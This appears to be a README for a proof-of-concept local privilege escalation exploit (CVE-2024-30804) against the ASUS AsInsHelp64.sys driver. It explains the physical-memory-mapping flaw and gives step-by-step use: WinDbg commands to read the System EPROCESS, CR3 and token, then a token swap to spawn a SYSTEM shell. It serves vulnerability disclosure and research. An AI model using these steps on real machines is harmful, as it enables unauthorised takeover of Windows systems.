This is a PoC for Local Privilege Escalation (LPE) that exploits the AsInsHelp64.sys driver.
It abuses a legitimate, signed ASUS driver to map physical memory and overwrite kernel tokens, eventually gaining NT AUTHORITY\SYSTEM privileges.
- Target:
AsInsHelp64.sys(Related to ASUS Fan Xpert < v.10013) - Technique: Arbitrary Physical Memory Read/Write
- Root Cause: The driver exposes an IOCTL that lets any user map physical memory into their virtual address space. By exploiting this, we can modify critical kernel structures without any permission checks.
- OS: Windows 10 (2004) ~ Windows 11 (23H2) x64
- Driver:
AsInsHelp64.sysmust be loaded. - Tools: WinDbg (Required for stability).
- Run the Exploit
- Get Info from WinDbg:
Instead of risking a crash by scanning memory, retrieve the exact addresses manually:
- Get System EPROCESS & CR3:
!process 0 0 System - Get System Token:
dq <System_EPROCESS>+4b8 L1
- Get System EPROCESS & CR3:
- Input & Pwn: Enter the values into the tool. It will automatically find your process and swap the token.
Run the compiled. The program will ask for System information.
Open WinDbg and execute the following command to find the System process:
!process 0 0 System
Copy the address following PROCESS and the value of DirBase(CR3)
Use the address found in the previous step to read the Token value.
dq <System_EPROCESS_Address>+4b8 L1
The tool will locate your process in the kernel, overwrite the token, and spawn a new CMD.
whoami
https://github.com/DriverHunter/Win-Driver-EXP/tree/main/CVE-2024-30804